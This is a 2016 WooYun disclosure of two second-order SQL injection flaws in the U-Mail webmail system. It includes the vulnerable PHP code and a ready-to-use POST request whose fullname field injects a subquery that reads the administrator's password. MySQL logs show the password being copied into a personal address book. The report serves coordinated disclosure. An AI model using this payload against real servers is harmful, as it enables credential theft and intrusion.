当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(69) 关注此漏洞

缺陷编号: WooYun-2016-172079

漏洞标题: U-Mail邮件系统2处注入

相关厂商: U-Mail

漏洞作者: Ano_Tom认证白帽子

提交时间: 2016-01-25 09:42

公开时间: 2016-01-28 17:30

漏洞类型:

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

9人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-25: 细节已通知厂商并且等待厂商处理中
2016-01-29: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-24: 细节向核心白帽子及相关领域专家公开
2016-04-03: 细节向普通白帽子公开
2016-04-13: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

:)

详细说明:

U-Mail最新版V9.8.59

环境:win2003+官网下载最新版(官网下载显示v9.8.57版本,其程序最后更新时间为2015.03.26修正了很多漏洞,安装后在web目录查看version.txt发现实际版本是v9.8.59)

如图

c1.png



漏洞修复不当,导致sql注入,可获取管理员密码。

旧版漏洞分析http://**.**.**.**/bugs/wooyun-2015-093376,新版更新了,修复了多个sql注入,其中修复该二次注入时候,其在更新资料处做了过滤函数,旧版的入库文件为

/client/option/module/o_userinfo.php

代码为

code 区域
if ( ACTION == "userinfo" )


{


		$url = make_link( "option", "view", "userinfo" );


		$where = "UserID='".$user_id."'";


		$data = array(


				"FullName" => text_secure_filter( gss( $_POST['fullname'] ) ),


				"EnglishName" => text_secure_filter( gss( $_POST['englishname'] ) )


		);


		$result = $Mailbox->update_mailbox( $data, $where, 0 );


		if ( !$result )


		{


				redirect( $url, "修改姓名时出现错误,修改失败!" );


		}



c2.png



查看过滤函数

/admin/include/base.func.php代码为

code 区域
function text_secure_filter( $_obfuscate_VgKtFegÿ, $_obfuscate_2TiPwh70 = FALSE )


{


		$_obfuscate_VgKtFegÿ = str_replace( "/*", "", $_obfuscate_VgKtFegÿ );


		$_obfuscate_VgKtFegÿ = str_replace( "*/", "", $_obfuscate_VgKtFegÿ );


		$_obfuscate_VgKtFegÿ = str_replace( "#", "", $_obfuscate_VgKtFegÿ );


		if ( $_obfuscate_2TiPwh70 )


		{


				$_obfuscate_VgKtFegÿ = str_replace( "(", "", $_obfuscate_VgKtFegÿ );


				$_obfuscate_VgKtFegÿ = str_replace( ")", "", $_obfuscate_VgKtFegÿ );


		}


		return $_obfuscate_VgKtFegÿ;


}



其过滤了mysql的注释符,很明显这种方式不妥,这种类似黑名单的修复方式很容易被绕过,这里使用mysql的--注释符即可绕过,注意注释符--后要跟个空格。



而该漏洞文件/client/oabshare/module/operates.php内容仍然未变化,其应该在该文件的数据出处加过滤

code 区域
if ( ACTION == "save-to-pab" )


{


		include_once( LIB_PATH."PAB.php" );


		$PAB = PAB::getinstance( );


		$maillist_id = gss( $_GET['maillist'] );


		$maillist_id = intval( $maillist_id );


		if ( $maillist_id )


		{


				$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );


				if ( !$member_all )


				{


						dump_json( array( "status" => TRUE, "message" => "" ) );


				}


				foreach ( $member_all as $member )


				{


						if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )


						{


								$data = array(


										"user_id" => $user_id,


										"fullname" => $member['FullName'],//二次注入,未过滤


										"pref_email" => $member['Mailbox'],


										"updated" => date( "Y-m-d H:i:s" )


								);


								$res = $PAB->add_contact( $data, 0 );//入库


								if ( !$res )


								{


										dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );


								}


						}


				}


		}



漏洞证明:

漏洞利用:

登录邮箱后,点击更新个人资料,

c4.png



请求为

code 区域
POST /webmail/client/option/index.php?module=operate&action=userinfo&return=%2Fwebmail%2Fclient%2Foption%2Findex.php%3Fmodule%3Dview%26action%3Duserinfo HTTP/1.1


Host: **.**.**.**


Proxy-Connection: keep-alive


Content-Length: 195


Cache-Control: max-age=0


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


Origin: http://**.**.**.**


User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36


Content-Type: application/x-www-form-urlencoded


Referer: http://**.**.**.**/webmail/client/option/index.php?module=view&action=userinfo


Accept-Encoding: gzip, deflate


Accept-Language: zh-CN,zh;q=0.8


Cookie: login=system%2Czh; PHPSESSID=92d69b792d29c6c15915ddd4bcc401a5


fullname=%27%2C%60homepage%60%3D%28SELECT+password+from+userlist+where+userid%3D2%29--+-+&englishname=&gender=0&bd_year=0000&bd_month=00&bd_day=00&mobile=&tel=&extnum=&im=&o_group=&worknum=&memo=



更新个人资料的sql语句

code 区域
160123  0:02:39	  623 Connect	umail@localhost on 


		  623 Query	SET NAMES 'UTF8'


		  623 Init DB	umail


		  623 Query	UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)-- -',`EnglishName`='' WHERE UserID='5'


		  623 Query	UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='5'


		  623 Quit



更新资料后获取用户的userid,执行请求为

http://**.**.**.**/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=whoami003

c5.png



其执行的其执行的入库sql语句为

code 区域
160123  0:06:47	  629 Connect	umail@localhost on 


		  629 Query	SET NAMES 'UTF8'


		  629 Init DB	umail


		  629 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*


				FROM userlist as t1, mailuserinfo as t2


				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (5)


				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC


		  629 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*


				FROM userlist as t1, mailuserinfo as t2


				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (5)


				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC


		  629 Query	SELECT contact_id FROM pab_contact WHERE user_id='5' AND pref_email='whoami003@**.**.**.**' LIMIT 1


		  629 Query	INSERT INTO pab_contact SET `user_id`='5',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)-- -',`pref_email`='whoami003@**.**.**.**',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2016-01-23 00:06:47'


		  629 Quit



在个人通讯录中查看管理员密码

c6.png



二、注入2

原理类似,该文件/client/oab/module/operates.php也存在注入,之前的分析http://**.**.**.**/bugs/wooyun-2010-099221

code 区域
if ( ACTION == "save-to-pab" )


{


		include_once( LIB_PATH."PAB.php" );


		$PAB = PAB::getinstance( );


		$maillist_id = gss( $_GET['maillist'] );


		if ( $maillist_id )


		{


				$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );


				if ( !$member_all )


				{


						dump_json( array( "status" => TRUE, "message" => "" ) );


				}


				foreach ( $member_all as $member )


				{


						if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )


						{


								$data = array(


										"user_id" => $user_id,


										"fullname" => $member['FullName'],


										"pref_email" => $member['Mailbox'],


										"updated" => date( "Y-m-d H:i:s" )


								);


								$res = $PAB->add_contact( $data, 0 );


								if ( !$res )


								{


										dump_json( array(


												"status" => FALSE,


												"message" => el( "添加联系人时发生错误,添加失败!", "" )


										) );


								}


						}


				}


		}


		else


		{


				$user_ids = gss( $_GET['userlist'] );


				$user_ids = id_list_filter( $user_ids );


				if ( !$user_ids )


				{


						dump_msg( "param_error", el( "参数错误!", "" ) );


				}


				$where = "t1.UserID IN (".$user_ids.")";


				$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );


				$user_all = $arr_tmp['data'];


				if ( !$user_all )


				{


						dump_json( array( "status" => TRUE, "message" => "" ) );


				}


				foreach ( $user_all as $user )


				{


						$qq = $msn = "";


						if ( strpos( $user['qqmsn'], "@" ) )


						{


								$msn = $user['qqmsn'];


						}


						else


						{


								$qq = $user['qqmsn'];


						}


						if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )


						{


								$data = array(


										"user_id" => $user_id,


										"fullname" => $user['FullName'],//出库


										"pref_email" => $user['email'],


										"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],


										"birthday" => $user['birthday'],


										"im_qq" => $qq,


										"im_msn" => $msn,


										"updated" => date( "Y-m-d H:i:s" )


								);


								$res = $PAB->add_contact( $data, 0 );//入库


								if ( !$res )


								{


										dump_json( array(


												"status" => FALSE,


												"message" => el( "添加联系人时发生错误,添加失败!", "" )


										) );


								}


						}


				}


		}


		dump_json( array( "status" => TRUE, "message" => "" ) );


}

修复方案:

深入理解mysql的注释符,深入理解二次注入。过滤。

版权声明:转载请注明来源 Ano_Tom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-29 16:56

厂商回复:

CNVD未直接复现所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-01-25 09:47 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    还有...

    1# 回复此人
  2. 2016-01-25 10:18 | 伤心的猫猫 ( 普通白帽子 | Rank:115 漏洞数:32 | @sangfor,@qq,@alibaba,@baidu)
    0

    是不是可以刷rank了。。。

    2# 回复此人
  3. 2016-01-25 10:57 | sunnyf ( 实习白帽子 | Rank:60 漏洞数:8 )
    0

    醉了,又是注入

    3# 回复此人
  4. 2016-01-25 12:10 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)
    0

    肯定还有更多

    4# 回复此人
  5. 2016-01-25 15:06 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:467 漏洞数:127 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)
    0

    tangscan 插件 +2

    5# 回复此人
  6. 2016-01-27 04:34 | Arthur ( 实习白帽子 | Rank:85 漏洞数:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)
    0

    我就知道。。。。

    6# 回复此人
  7. 2016-01-27 15:19 | 明月影 ( 路人 | Rank:12 漏洞数:8 )
    0

    多年umail。666

    7# 回复此人
  8. 2016-01-30 22:37 | watchdoge ( 路人 | Rank:14 漏洞数:8 | web汪,渗透狗)
    0

    专注Umail一万年

    8# 回复此人
  9. 2016-01-31 08:26 | AK-47 ( 实习白帽子 | Rank:78 漏洞数:11 | 开开心心挖洞,踏踏实实上学!)
    0

    又被你注入了

    9# 回复此人
  10. 2016-02-16 09:57 | JoyChou ( 路人 | Rank:22 漏洞数:6 | 无)
    1

    666

    10# 回复此人

登录后才能发表评论,请先 登录